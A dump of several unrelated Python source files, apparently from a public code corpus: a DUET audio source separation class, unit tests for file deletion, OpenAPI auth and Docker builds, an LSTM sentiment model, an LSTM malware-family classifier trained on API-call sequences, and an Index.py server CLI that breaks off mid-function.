DUET extracts sources using the symmetric attenuation and relative delay between
two channels. The symmetric attenuation is calculated from the ratio of the two
channels' stft amplitudes, and the delay is the arrival delay between the two
sensors used to record the audio signal. These two values are clustered as peaks on
a histogram to determine where each source occurs. This implementation of DUET
creates and returns Mask objects after the run() function, which can then be
applied to the original audio signal to extract each individual source.
References:
[1] Rickard, Scott. "The DUET blind source separation algorithm."
Blind Speech Separation. Springer Netherlands, 2007. 217-241.
[2] Yilmaz, Ozgur, and <NAME>. "Blind separation of speech mixtures
via time-frequency masking."
Signal Processing, IEEE transactions on 52.7 (2004): 1830-1847.
Args:
input_audio_signal (np.array): a 2-row Numpy matrix containing samples of the
two-channel mixture.
num_sources (int): Number of sources to find.
attenuation_min (int): Minimum distance in utils.find_peak_indices, change if
not enough peaks are identified.
attenuation_max (int): Used for creating a histogram without outliers.
num_attenuation_bins (int): Number of bins for attenuation.
delay_min (int): Lower bound on delay, used as minimum distance in
utils.find_peak_indices.
delay_max (int): Upper bound on delay, used for creating a histogram without
outliers.
num_delay_bins (int): Number of bins for delay.
peak_threshold (float): Value in [0, 1] for peak picking.
attenuation_min_distance (int): Minimum distance between peaks wrt attenuation.
delay_min_distance (int): Minimum distance between peaks wrt delay.
p (int): Weight the histogram with the symmetric attenuation estimator.
        q (int): Weight the histogram with the delay estimator.
Notes:
On page 8 of his paper, Rickard recommends p=1 and q=0 as a default starting
point and p=.5, q=0 if one source is more dominant.
Attributes:
stft_ch0 (np.array): A Numpy matrix containing the stft data of channel 0.
stft_ch1 (np.array): A Numpy matrix containing the stft data of channel 1.
frequency_matrix (np.array): A Numpy matrix containing the frequencies of
analysis.
symmetric_atn (np.array): A Numpy matrix containing the symmetric attenuation
between the two channels.
delay (np.array): A Numpy matrix containing the delay between the two channels.
num_time_bins (np.array): The number of time bins for the frequency matrix and
mask arrays.
num_frequency_bins (int): The number of frequency bins for the mask arrays.
attenuation_bins (int): A Numpy array containing the attenuation bins for the
histogram.
delay_bins (np.array): A Numpy array containing the delay bins for the histogram.
normalized_attenuation_delay_histogram (np.array): A normalized Numpy matrix
containing the attenuation delay histogram, which has peaks for each source.
attenuation_delay_histogram (np.array): A non-normalized Numpy matrix containing
the attenuation delay histogram, which has peaks for each source.
peak_indices (np.array): A Numpy array containing the indices of the peaks for
the histogram.
separated_sources (np.array): A Numpy array of arrays containing each
separated source.
"""
def __init__(self, input_audio_signal, num_sources,
attenuation_min=-3, attenuation_max=3, num_attenuation_bins=50,
delay_min=-3, delay_max=3, num_delay_bins=50,
peak_threshold=0.0, attenuation_min_distance=5, delay_min_distance=5,
p=1, q=0, mask_type='binary'):
super().__init__(
input_audio_signal=input_audio_signal,
mask_type=mask_type)
self.num_sources = num_sources
self.attenuation_min = attenuation_min
self.attenuation_max = attenuation_max
self.num_attenuation_bins = num_attenuation_bins
self.delay_min = delay_min
self.delay_max = delay_max
self.num_delay_bins = num_delay_bins
self.peak_threshold = peak_threshold
self.attenuation_min_distance = attenuation_min_distance
self.delay_min_distance = delay_min_distance
self.p = p
self.q = q
self.stft_ch0 = None
self.stft_ch1 = None
self.frequency_matrix = None
self.symmetric_atn = None
self.delay = None
self.num_time_bins = None
self.num_frequency_bins = None
self.attenuation_bins = None
self.delay_bins = None
self.normalized_attenuation_delay_histogram = None
self.attenuation_delay_histogram = None
self.peak_indices = None
self.delay_peak = None
self.atn_peak = None
self.separated_sources = None
def run(self):
""" Extracts N sources from a given stereo audio mixture (N sources captured via 2 sensors)
Returns:
computed_masks (np.array): A list of binary mask objects that can be used to extract the sources
Example:
.. code-block:: python
:linenos:
#Import input audio signal
input_file_name = '../Input/dev1_female3_inst_mix.wav'
signal = AudioSignal(path_to_input_file=input_file_name)
# Set up and run Duet
duet = Duet(signal, a_min=-3, a_max=3, a_num=50, d_min=-3, d_max=3, d_num=50, threshold=0.2,
a_min_distance=5, d_min_distance=5, num_sources=3)
duet.run()
# plot histogram results
duet.plot(os.path.join('..', 'Output', 'duet_2d.png'))
duet.plot(os.path.join('..', 'Output', 'duet_3d.png'), three_d_plot=True)
# Create output file for each source found
output_name_stem = os.path.join('..', 'Output', 'duet_source')
i = 1
for s in duet.make_audio_signals():
output_file_name = f"{output_name_stem}{i}.wav"
s.write_audio_to_file(output_file_name)
i += 1
"""
self.result_masks = []
# Calculate the stft of both channels and create the frequency matrix (the matrix containing the
# frequencies of analysis of the Fourier transform)
self.stft_ch0, self.stft_ch1, self.frequency_matrix = self._compute_spectrogram(
self.sample_rate)
# Calculate the symmetric attenuation (alpha) and delay (delta) for each
# time-freq. point and return a matrix for each
self.symmetric_atn, self.delay = self._compute_atn_delay(
self.stft_ch0, self.stft_ch1, self.frequency_matrix)
# Make histogram of attenuation-delay values and get the center values for the bins in this histogram
self.normalized_attenuation_delay_histogram, self.attenuation_bins, self.delay_bins = (
self._make_histogram()
)
# Find the location of peaks in the attenuation-delay plane
self.peak_indices = utils.find_peak_indices(
self.normalized_attenuation_delay_histogram, self.num_sources,
threshold=self.peak_threshold,
min_dist=[self.attenuation_min_distance, self.delay_min_distance])
# compute delay_peak, attenuation peak, and attenuation/delay estimates
self.delay_peak, atn_delay_est, self.atn_peak = self._convert_peaks(
self.peak_indices)
# compute masks for separation
computed_masks = self._compute_masks()
return computed_masks
def _compute_spectrogram(self, sample_rate):
""" Creates the STFT matrices for channel 0 and 1, and computes the frequency matrix.
Parameter:
sample_rate (integer): sample rate
Returns:
stft_ch0 (np.matrix): a 2D Numpy matrix containing the stft of channel 0
stft_ch1 (np.matrix): a 2D Numpy matrix containing the stft of channel 1
wmat (np.matrix): a 2D Numpy matrix containing the frequencies of analysis of the Fourier transform
"""
# Compute the stft of the two channel mixtures
self.audio_signal.stft_params = self.stft_params
self.audio_signal.stft()
stft_ch0 = self.audio_signal.get_stft_channel(0)
stft_ch1 = self.audio_signal.get_stft_channel(1)
# Compute the freq. matrix for later use in phase calculations
n_time_bins = len(self.audio_signal.time_bins_vector)
wmat = np.array(np.tile(np.mat(
self.audio_signal.freq_vector).T, (1, n_time_bins))) * (
2 * np.pi / sample_rate)
wmat += constants.EPSILON
return stft_ch0, stft_ch1, wmat
@staticmethod
def _compute_atn_delay(stft_ch0, stft_ch1, frequency_matrix):
# Calculate the symmetric attenuation (alpha) and delay (delta) for each
# time-freq. point
inter_channel_ratio = (stft_ch1 + constants.EPSILON) / (stft_ch0 + constants.EPSILON)
attenuation = np.abs(inter_channel_ratio) # relative attenuation between the two channels
symmetric_attenuation = attenuation - 1 / attenuation # symmetric attenuation
relative_delay = -np.imag(np.log(inter_channel_ratio)) / (2 * np.pi * frequency_matrix) # relative delay
return symmetric_attenuation, relative_delay
def _make_histogram(self):
"""Receives the stft of the two channel mixtures and the frequency matrix to a create
a smooth and normalized histogram.
Parameters:
stft_ch0 (complex np.array): a 2D Numpy matrix containing the stft of channel 0
stft_ch1 (complex np.array): a 2D Numpy matrix containing the stft of channel 1
symmetric_atn (np.array): the symmetric attenuation between two channels
delay (np.array): the time delay between 2 channels
wmat(np.array): a 2D Numpy matrix containing the frequency matrix of the signal
Returns:
histogram (np.array): a smooth and normalized histogram
atn_bins (np.array): The range of attenuation values distributed into bins
delay_bins (np.array): The range of delay values distributed into bins
"""
# calculate the weighted histogram
time_frequency_weights = (np.abs(self.stft_ch0) * np.abs(self.stft_ch1)) ** self.p * \
(np.abs(self.frequency_matrix)) ** self.q
# only consider time-freq. points yielding estimates in bounds
attenuation_premask = np.logical_and(self.attenuation_min < self.symmetric_atn,
self.symmetric_atn < self.attenuation_max)
delay_premask = np.logical_and(self.delay_min < self.delay, self.delay < self.delay_max)
attenuation_delay_premask = np.logical_and(attenuation_premask, delay_premask)
nonzero_premask = np.nonzero(attenuation_delay_premask)
symmetric_attenuation_vector = self.symmetric_atn[nonzero_premask]
delay_vector = self.delay[nonzero_premask]
time_frequency_weights_vector = time_frequency_weights[nonzero_premask]
bins_array = np.array([self.num_attenuation_bins, self.num_delay_bins])
range_array = np.array([[self.attenuation_min, self.attenuation_max], [self.delay_min, self.delay_max]])
# compute the histogram
histogram, atn_bins, delay_bins = np.histogram2d(symmetric_attenuation_vector, delay_vector,
bins=bins_array, range=range_array,
weights=time_frequency_weights_vector)
# Save non-normalized as an option for plotting later
self.attenuation_delay_histogram = histogram
# Scale histogram from 0 to 1
histogram /= histogram.max()
# smooth the normalized histogram - local average 3-by-3 neighboring bins
histogram = self._smooth_matrix(histogram, np.array([3]))
return histogram, atn_bins, delay_bins
def _convert_peaks(self, peak_indices):
"""Receives the attenuation and delay bins and computes the delay/attenuation
peaks based on the peak finder indices.
Returns:
delay_peak(np.array): The delay peaks determined from the histogram
atn_delay_est (np.array): The estimated symmetric attenuation and delay values
atn_peak (np.array): Attenuation converted from symmetric attenuation
"""
atn_indices = [x[0] for x in peak_indices]
delay_indices = [x[1] for x in peak_indices]
symmetric_atn_peak = self.attenuation_bins[atn_indices]
delay_peak = self.delay_bins[delay_indices]
atn_delay_est = np.column_stack((symmetric_atn_peak, delay_peak))
# convert symmetric_atn to atn_peak using formula from Rickard
atn_peak = (symmetric_atn_peak + np.sqrt(symmetric_atn_peak ** 2 + 4)) / 2
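        # Derivation note (added for clarity): the symmetric attenuation is defined above as
        # alpha = a - 1/a, so a satisfies a**2 - alpha*a - 1 = 0 and the positive root is
        # a = (alpha + sqrt(alpha**2 + 4)) / 2, which is exactly the expression used here.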
return delay_peak, atn_delay_est, atn_peak
def _compute_masks(self):
"""Receives the attenuation and delay peaks and computes a mask to be applied to the signal for source
separation.
"""
# compute masks for separation
best_so_far = np.inf * np.ones_like(self.stft_ch0, dtype=float)
for i in range(0, self.num_sources):
mask_array = np.zeros_like(self.stft_ch0, dtype=bool)
phase = np.exp(-1j * self.frequency_matrix * self.delay_peak[i])
score = np.abs(self.atn_peak[i] * phase * self.stft_ch0 - self.stft_ch1) ** 2 / (1 + self.atn_peak[i] ** 2)
mask = (score < best_so_far)
mask_array[mask] = True
background_mask = self.mask_type(np.array(mask_array))
self.result_masks.append(background_mask)
self.result_masks[0].mask = np.logical_xor(self.result_masks[i].mask, self.result_masks[0].mask)
best_so_far[mask] = score[mask]
# Compute first mask based on what the other masks left remaining
self.result_masks[0].mask = np.logical_not(self.result_masks[0].mask)
return self.result_masks
@staticmethod
def _smooth_matrix(matrix, kernel):
"""Performs two-dimensional convolution in order to smooth the values of matrix elements.
(similar to low-pass filtering)
Parameters:
matrix (np.array): a 2D Numpy matrix to be smoothed
kernel (np.array): a 2D Numpy matrix containing kernel values
Note:
if Kernel is of size 1 by 1 (scalar), a Kernel by Kernel matrix of 1/Kernel**2 will be used as the matrix
averaging kernel
Output:
smoothed_matrix (np.array): a 2D Numpy matrix containing a smoothed version of Mat (same size as Mat)
"""
# check the dimensions of the Kernel matrix and set the values of the averaging
# matrix, kernel_matrix
kernel_matrix = np.ones((kernel[0], kernel[0])) / kernel[0] ** 2
krow, kcol = np.shape(kernel_matrix)
# adjust the matrix dimension for convolution
copy_row = int(np.floor(krow / 2)) # number of rows to copy on top and bottom
copy_col = int(np.floor(kcol / 2)) # number of columns to copy on either side
# TODO: This is very ugly. Make this readable.
# form the augmented matrix (rows and columns added to top, bottom, and sides)
matrix = np.mat(matrix) # make sure Mat is a Numpy matrix
augmented_matrix = np.vstack(
[
np.hstack(
[matrix[0, 0] * np.ones((copy_row, copy_col)),
np.ones((copy_row, 1)) * matrix[0, :],
matrix[0, -1] * np.ones((copy_row, copy_col))
]),
np.hstack(
[matrix[:, 0] * np.ones((1, copy_col)),
matrix,
matrix[:, -1] * np.ones((1, copy_col))]),
np.hstack(
[matrix[-1, 1] * np.ones((copy_row, copy_col)),
np.ones((copy_row, 1)) * matrix[-1, :],
matrix[-1, -1] * np.ones((copy_row, copy_col))
]
)
]
)
# perform two-dimensional convolution between the input matrix and the kernel
        smoothed_matrix = signal.convolve2d(augmented_matrix, kernel_matrix[::-1, ::-1], mode='valid')
        return smoothed_matrix
|
scale/storage/test/test_delete_files_job.py | kaydoh/scale | 121 | 47190 | from __future__ import unicode_literals
import os
import django
from django.test import TestCase
from mock import call, patch
from storage.brokers.host_broker import HostBroker
from storage.delete_files_job import delete_files
from storage.test import utils as storage_test_utils
class TestDeleteFiles(TestCase):
def setUp(self):
django.setup()
self.broker = HostBroker()
self.broker.load_configuration({'type': HostBroker().broker_type, 'host_path': '/host/path'})
@patch('storage.brokers.host_broker.os.path.exists')
@patch('storage.brokers.host_broker.os.remove')
def test_delete_file(self, mock_remove, mock_exists):
"""Tests removing a file"""
def new_exists(path):
return True
mock_exists.side_effect = new_exists
volume_path = os.path.join('the', 'volume', 'path')
file_path_1 = os.path.join('my_dir', 'my_file.txt')
file_path_2 = os.path.join('my_dir', 'my_file.json')
full_path_file_1 = os.path.join(volume_path, file_path_1)
full_path_file_2 = os.path.join(volume_path, file_path_2)
file_1 = storage_test_utils.create_file(file_path=file_path_1)
file_2 = storage_test_utils.create_file(file_path=file_path_2)
# Call function
test_1 = delete_files([file_1], volume_path, self.broker)
self.assertEqual(test_1, None)
test_2 = delete_files([file_2], volume_path, self.broker)
self.assertEqual(test_2, None)
# Check results
two_calls = [call(full_path_file_1), call(full_path_file_2)]
mock_remove.assert_has_calls(two_calls)
|
junior_class/chapter-6-sentiment_classification/code/model/sentiment_classifier.py | wwhio/awesome-DeepLearning | 1,150 | 47210 | # copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn.functional as F
from paddle.nn import LSTM, Embedding, Dropout, Linear
import numpy as np
class SentimentClassifier(paddle.nn.Layer):
def __init__(self, hidden_size, vocab_size, class_num=2, num_steps=128, num_layers=1, init_scale=0.1, dropout=None):
        # The arguments have the following meanings:
        # 1. hidden_size: the embedding size, i.e. the dimension of the hidden and cell vectors
        # 2. vocab_size: the size of the vocabulary the model can consider
        # 3. class_num: the number of sentiment classes; this can be binary or multi-class
        # 4. num_steps: the maximum sentence length this sentiment model can consider
        # 5. num_layers: the number of layers in the network
        # 6. init_scale: the initialization range for the network's internal parameters
        # LSTMs use many Tanh and Sigmoid activations internally, which are very sensitive to
        # numerical precision, so we generally use a fairly small initialization range to keep results stable
super(SentimentClassifier, self).__init__()
self.hidden_size = hidden_size
self.vocab_size = vocab_size
self.class_num = class_num
self.init_scale = init_scale
self.num_layers = num_layers
self.num_steps = num_steps
self.dropout = dropout
        # Declare an LSTM model used to encode each sentence into a vector
self.simple_lstm_rnn = LSTM(input_size=hidden_size, hidden_size=hidden_size, num_layers=num_layers)
        # Declare an embedding layer used to convert every word in a sentence into a vector
self.embedding = Embedding(num_embeddings=vocab_size, embedding_dim=hidden_size, sparse=False,
weight_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Uniform(low=-init_scale, high=init_scale)))
        # After obtaining a sentence's vector representation, the sentence is classified based on that vector.
        # Typically, the sentence vector is multiplied by a weight W of shape [self.hidden_size, self.class_num]
        # and a bias b of shape [self.class_num] is added, mapping the sentence vector to the classification result.
        # Here we declare the parameters needed to map the sentence vector to a concrete sentiment class;
        # this parameter is typically of shape [self.hidden_size, self.class_num]
self.cls_fc = Linear(in_features=self.hidden_size, out_features=self.class_num,
weight_attr=None, bias_attr=None)
self.dropout_layer = Dropout(p=self.dropout, mode='upscale_in_train')
def forward(self, input, label):
batch_size = len(input)
        # First define the LSTM's initial hidden and cell states; here the sequence memory is initialized with zeros
init_hidden_data = np.zeros(
(self.num_layers, batch_size, self.hidden_size), dtype='float32')
init_cell_data = np.zeros(
(self.num_layers, batch_size, self.hidden_size), dtype='float32')
        # Convert these initial memories into tensors that Paddle can compute with.
        # Set stop_gradient=True so these tensors are not updated, which would otherwise affect training
init_hidden = paddle.to_tensor(init_hidden_data)
init_hidden.stop_gradient = True
init_cell = paddle.to_tensor(init_cell_data)
init_cell.stop_gradient = True
init_h = paddle.reshape(
init_hidden, shape=[self.num_layers, -1, self.hidden_size])
init_c = paddle.reshape(
init_cell, shape=[self.num_layers, -1, self.hidden_size])
        # Convert the input mini-batch of sentences into word-embedding representations
x_emb = self.embedding(input)
x_emb = paddle.reshape(
x_emb, shape=[-1, self.num_steps, self.hidden_size])
if self.dropout is not None and self.dropout > 0.0:
x_emb = self.dropout_layer(x_emb)
        # Use the LSTM network to convert each sentence into a vector representation
rnn_out, (last_hidden, last_cell) = self.simple_lstm_rnn(x_emb, (init_h, init_c))
last_hidden = paddle.reshape(
last_hidden[-1], shape=[-1, self.hidden_size])
        # Map each sentence's vector representation to a concrete sentiment class
projection = self.cls_fc(last_hidden)
pred = F.softmax(projection, axis=-1)
        # Compute the network's loss from the given labels; cross-entropy, commonly used for classification tasks, is applied here
loss = F.softmax_with_cross_entropy(
logits=projection, label=label, soft_label=False)
loss = paddle.mean(loss)
        # Finally, return the prediction pred and the network loss
return pred, loss
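# Usage sketch (illustrative only, not part of the original file); the sizes and shapes below are assumptions:
#   model = SentimentClassifier(hidden_size=256, vocab_size=5000, num_steps=128)
#   pred, loss = model(inputs, labels)  # inputs: [batch, num_steps] word ids; labels: [batch, 1] class ids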
|
tests/test_openapi_scheme.py | montaro/fastapi-azure-auth | 137 | 47211 | import pytest
from demo_project.main import app
from fastapi.testclient import TestClient
openapi_schema = {
'openapi': '3.0.2',
'info': {
'title': 'My Project',
'description': '## Welcome to my API! \n This is my description, written in `markdown`',
'version': '1.0.0',
},
'paths': {
'/api/v1/hello': {
'get': {
'tags': ['hello'],
'summary': 'Say hello',
'description': 'Wonder who we say hello to?',
'operationId': 'helloWorld',
'responses': {
'200': {
'description': 'Successful Response',
'content': {
'application/json': {'schema': {'$ref': '#/components/schemas/HelloWorldResponse'}}
},
}
},
'security': [{'Azure AD - PKCE, Single-tenant': []}],
}
},
'/api/v1/hello-multi-auth': {
'get': {
'tags': ['hello'],
'summary': 'Say hello with an API key',
'description': 'Wonder how this auth is done?',
'operationId': 'helloWorldApiKey',
'responses': {
'200': {
'description': 'Successful Response',
'content': {'application/json': {'schema': {'$ref': '#/components/schemas/TokenType'}}},
}
},
'security': [{'Azure AD - PKCE, Multi-tenant': []}, {'APIKeyHeader': []}],
}
},
},
'components': {
'schemas': {
'HelloWorldResponse': {
'title': 'HelloWorldResponse',
'required': ['hello', 'user'],
'type': 'object',
'properties': {
'hello': {'title': 'Hello', 'type': 'string', 'description': 'What we\'re saying hello to'},
'user': {
'title': 'User',
'allOf': [{'$ref': '#/components/schemas/User'}],
'description': 'The user object',
},
},
},
'TokenType': {
'title': 'TokenType',
'required': ['api_key', 'azure_auth'],
'type': 'object',
'properties': {
'api_key': {'title': 'Api Key', 'type': 'boolean', 'description': 'API key was used'},
'azure_auth': {'title': 'Azure Auth', 'type': 'boolean', 'description': 'Azure auth was used'},
},
},
'User': {
'title': 'User',
'required': ['aud', 'tid', 'claims', 'access_token'],
'type': 'object',
'properties': {
'aud': {'title': 'Aud', 'type': 'string', 'description': 'Audience'},
'tid': {'title': 'Tid', 'type': 'string', 'description': 'Tenant ID'},
'roles': {
'title': 'Roles',
'type': 'array',
'items': {'type': 'string'},
'description': 'Roles (Groups) the user has for this app',
'default': [],
},
'claims': {'title': 'Claims', 'type': 'object', 'description': 'The entire decoded token'},
'scp': {'title': 'Scp', 'type': 'string', 'description': 'Scope'},
'name': {'title': 'Name', 'type': 'string', 'description': 'Name'},
'access_token': {
'title': 'Access Token',
'type': 'string',
'description': 'The access_token. Can be used for fetching the Graph API',
},
},
},
},
'securitySchemes': {
'Azure AD - PKCE, Single-tenant': {
'type': 'oauth2',
'description': '`Leave client_secret blank`',
'flows': {
'authorizationCode': {
'scopes': {
'api://oauth299-9999-9999-abcd-efghijkl1234567890/user_impersonation': '**No client secret needed, leave blank**'
},
'authorizationUrl': 'https://login.microsoftonline.com/intility_tenant_id/oauth2/v2.0/authorize',
'tokenUrl': 'https://login.microsoftonline.com/intility_tenant_id/oauth2/v2.0/token',
}
},
},
'Azure AD - PKCE, Multi-tenant': {
'description': '`Leave ' 'client_secret ' 'blank`',
'flows': {
'authorizationCode': {
'authorizationUrl': 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize',
'scopes': {
'api://oauth299-9999-9999-abcd-efghijkl1234567890/user_impersonation': 'User '
'impersonation'
},
'tokenUrl': 'https://login.microsoftonline.com/common/oauth2/v2.0/token',
}
},
'type': 'oauth2',
},
'APIKeyHeader': {'type': 'apiKey', 'in': 'header', 'name': 'TEST-API-KEY'},
},
},
}
@pytest.fixture
def test_client():
"""
Test client that does not run startup event.
All these tests fails before we get to loading the OpenID Connect configuration.
"""
yield TestClient(app=app)
def test_openapi_schema(test_client):
response = test_client.get('api/v1/openapi.json')
assert response.status_code == 200, response.text
assert response.json() == openapi_schema
def test_no_token(test_client):
response = test_client.get('/api/v1/hello')
assert response.status_code == 401, response.text
assert response.json() == {'detail': 'Not authenticated'}
def test_incorrect_token(test_client):
response = test_client.get('/api/v1/hello', headers={'Authorization': 'Non-existent testtoken'})
assert response.status_code == 401, response.text
assert response.json() == {'detail': 'Not authenticated'}
def test_token(test_client):
response = test_client.get('/api/v1/hello', headers={'Authorization': 'Bearer '})
assert response.status_code == 401, response.text
assert response.json() == {'detail': 'Invalid token format'}
|
tests/test_load_docker_api.py | ReconPangolin/tern | 361 | 47218 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2020 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
import unittest
from tern.load import docker_api
from tern.utils import rootfs
from test_fixtures import create_working_dir
from test_fixtures import remove_working_dir
class TestLoadDockerAPI(unittest.TestCase):
"""This test case requires a temporary folder to be set up and the Docker
daemon to be up and running properly"""
def setUp(self):
self.client = docker_api.check_docker_setup()
create_working_dir()
rootfs.set_working_dir()
def tearDown(self):
# should not do anything if the client is already closed
docker_api.close_client(self.client)
# clean up working directory
remove_working_dir()
def testBuildAndRemoveImage(self):
# working dockerfile
dockerfile_path = 'tests/dockerfiles/debian_buster_apt'
image_obj = docker_api.build_image(dockerfile_path, self.client)
self.assertTrue(image_obj)
# successful remove
self.assertTrue(docker_api.remove_image(image_obj, self.client))
# remove an image that is not there
self.assertFalse(docker_api.remove_image(image_obj, self.client))
# no dockerfile
image_obj = docker_api.build_image(
'dockerfiles/not_there', self.client)
self.assertFalse(image_obj)
# failed build
image_obj = docker_api.build_image(
'tests/dockerfiles/fail_build', self.client)
self.assertFalse(image_obj)
def testExtractImage(self):
# successful save
dockerfile_path = 'tests/dockerfiles/debian_buster_apt'
image_obj = docker_api.build_image(dockerfile_path, self.client)
self.assertTrue(docker_api.extract_image(image_obj))
docker_api.remove_image(image_obj, self.client)
if __name__ == '__main__':
unittest.main()
|
tests/update_golds.py | leonardt/magma | 167 | 47219 | """
Expected to be run from repo root
"""
import shutil
import os
def copy_golds(dir_path):
for f in os.listdir(os.path.join(dir_path, "gold")):
try:
shutil.copy(
os.path.join(dir_path, "build", f),
os.path.join(dir_path, "gold", f)
)
except FileNotFoundError as e:
# corresponding build has different name or extra file
pass
copy_golds("tests")
for name in os.listdir("tests"):
if not os.path.isdir(os.path.join("tests", name)):
continue
if "gold" in os.listdir(os.path.join("tests", name)):
copy_golds(os.path.join("tests", name))
|
src/multiclass/LSTMMultiClass.py | ocatak/malware_api_class | 172 | 47226 | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""
import pandas as pd
from keras import preprocessing
import os
import datetime
from multiclass.AnalizeRunner import AnalizeRunner
##################################################
prefix = "dataset"
data_path = "C:\\Users\\afy\\PycharmProjects\\AnalizeProject\\deep-learning\Data\\result\\2018-09-19 23_05_12.089157\\filtered\\"
model_path = "C:\\Users\\afy\\PycharmProjects\\AnalizeProject\\multiclass\\result\\"
main_folder_name = model_path + str(datetime.datetime.now()).replace(":", "_") + "\\"
runner = AnalizeRunner()
def read_type_data():
df = pd.read_csv(data_path + prefix + "_types.zip", delimiter=' ', header=None, compression="zip")
df[0] = df[0].astype('category')
cat = df[0].cat
df[0] = df[0].cat.codes
y = df[0].values
return y
def read_call_data():
df = pd.read_csv(data_path + prefix + "_calls.zip", delimiter=' ', header=None, compression="zip")
D = df.values
ds_tmp = D[:, 0].tolist()
ds = []
for v in ds_tmp:
ds.append(v.split(','))
X = preprocessing.sequence.pad_sequences(ds, maxlen=342)
print(X.shape)
return X
os.makedirs(main_folder_name)
print("-------------------basliyor------------")
X = read_call_data()
y = read_type_data()
runner.startAnalize(X, y, main_folder_name) |
indexpy/cli.py | abersheeran/index.py | 242 | 47232 | from __future__ import annotations
import os
import signal
import subprocess
import sys
import time
from multiprocessing import cpu_count
from typing import List, Union
import click
from .__version__ import __version__
from .routing.commands import display_urls
from .utils import F, import_from_string, import_module
def execute(command: Union[List[str], str]) -> int:
if isinstance(command, str):
command = command.split(" ")
click.echo("Execute command: ", nl=False)
click.secho(" ".join(command), fg="green")
process = subprocess.Popen(command, shell=False)
def sigint_handler(signo, frame):
process.terminate()
process.wait()
signal.signal(signal.SIGTERM, sigint_handler)
while process.poll() is None:
time.sleep(1)
return process.returncode
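# Usage sketch (illustrative only; the command below is an arbitrary example):
#   exit_code = execute(["echo", "hello"])  # echoes the command, runs it, and returns its exit code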
@click.group(help=f"Index.py {__version__}")
def index_cli():
pass
try:
import hypercorn
except ImportError:
pass
else:
@click.command(help="use hypercorn to run Index.py application")
@click.option(
"--bind",
default="127.0.0.1:4190",
show_default=True,
help="A string of the form: HOST:PORT, unix:PATH, fd://FD.",
)
@click.option(
"--log-level",
type=click.Choice(["critical", "error", "warning", "info", "debug"]),
default="info",
show_default=True,
)
@click.option(
"--worker-class",
"-k",
default="asyncio",
type=click.Choice(["asyncio", "uvloop", "trio"]),
show_choices=True,
show_default=True,
)
@click.option(
"--configuration",
"-c",
type=click.Path(exists=True, file_okay=True, dir_okay=False, readable=True),
)
@click.argument("application")
def hypercorn_cli(
worker_class: str,
configuration: str,
application: str,
bind: str,
log_level: str,
):
sys.path.insert(0, os.getcwd())
asgi_app = import_from_string(application)
config = hypercorn.Config()
if configuration is not None:
if configuration.endswith(".py"):
config.from_pyfile(configuration)
elif configuration.endswith(".toml"):
config.from_toml(configuration)
else:
click.secho(
"Please use configuration file path endswith `.py` or `.toml`.",
fg="red",
)
raise SystemExit(1)
config.bind = [bind]
config.loglevel = log_level.upper()
config.worker_class = worker_class
create_signal_handle = lambda shutdown_event: lambda sig, frame: (
setattr(asgi_app, "should_exit", True), # type: ignore
shutdown_event.set(),
)
if worker_class == "uvloop":
import uvloop
uvloop.install()
if worker_class in ("asyncio", "uvloop"):
import asyncio
from hypercorn.asyncio import serve
loop = asyncio.get_event_loop()
shutdown_event = asyncio.Event(loop=loop)
for sig in {signal.SIGINT, signal.SIGTERM}:
signal.signal(sig, create_signal_handle(shutdown_event))
loop.run_until_complete(
serve(asgi_app, config, shutdown_trigger=shutdown_event.wait) # type: ignore
)
else:
import trio
from hypercorn.trio import serve # type: ignore
shutdown_event = trio.Event()
for sig in {signal.SIGINT, signal.SIGTERM}:
signal.signal(sig, create_signal_handle(shutdown_event))
trio.run(serve(asgi_app, config, shutdown_trigger=shutdown_event.wait)) # type: ignore
index_cli.add_command(hypercorn_cli, name="hypercorn")
try:
import uvicorn
except ImportError:
pass
else:
from .applications import Index
# See https://stackoverflow.com/questions/58133694/graceful-shutdown-of-uvicorn-starlette-app-with-websockets
origin_handle_exit = uvicorn.Server.handle_exit
def handle_exit(self: uvicorn.Server, sig, frame):
application = self.config.loaded_app
while not isinstance(application, Index):
application = application.app
application.should_exit = True
return origin_handle_exit(self, sig, frame)
uvicorn.Server.handle_exit = handle_exit
@click.command(help="use uvicorn to run Index.py application")
@click.option(
"--bind",
default="127.0.0.1:4190",
show_default=True,
help="A string of the form: HOST:PORT, unix:PATH, fd://FD.",
)
@click.option("--autoreload/--no-autoreload", default=True, show_default=True)
@click.option(
"--log-level",
type=click.Choice(["critical", "error", "warning", "info", "debug"]),
default="info",
show_default=True,
)
@click.argument("application")
def uvicorn_cli(application: str, bind: str, autoreload: bool, log_level: str):
sys.path.insert(0, os.getcwd())
if bind.startswith("unix:"):
bind_config = {"uds": bind[5:] | F(os.path.normpath) | F(os.path.abspath)}
if autoreload:
click.secho(
"Reload option doesnt work with unix sockets "
"in uvicorn: https://github.com/encode/uvicorn/issues/722",
fg="yellow",
)
elif bind.startswith("fd://"):
bind_config = {"fd": int(bind[5:])}
if autoreload:
click.secho(
"Reload option doesnt work with fd "
"in uvicorn: https://github.com/encode/uvicorn/issues/368",
fg="yellow",
)
else:
if ":" in bind:
host, port = bind.split(":")
bind_config = {"host": host, "port": int(port)}
else:
bind_config = {"host": bind, "port": 4190}
uvicorn.run(
application,
**bind_config,
log_level=log_level,
interface="asgi3",
lifespan="on",
reload=autoreload,
)
index_cli.add_command(uvicorn_cli, "uvicorn")
try:
import gunicorn
assert gunicorn.version_info > (20, 1)
del gunicorn
except ImportError:
pass
else:
MASTER_PID_FILE = ".gunicorn.pid"
def read_gunicorn_master_pid(pid_file: str = MASTER_PID_FILE) -> int:
try:
with open(os.path.join(os.getcwd(), pid_file), "r") as file:
return int(file.read())
except FileNotFoundError:
sys.exit(
(
f'File "{pid_file}" not found, '
+ "please make sure you have started gunicorn using the "
+ "`index-cli gunicorn start ...`."
)
)
@click.group(help="use gunicorn to run Index.py application")
def gunicorn_cli():
pass
@gunicorn_cli.command(help="Run gunicorn")
@click.option(
"--bind",
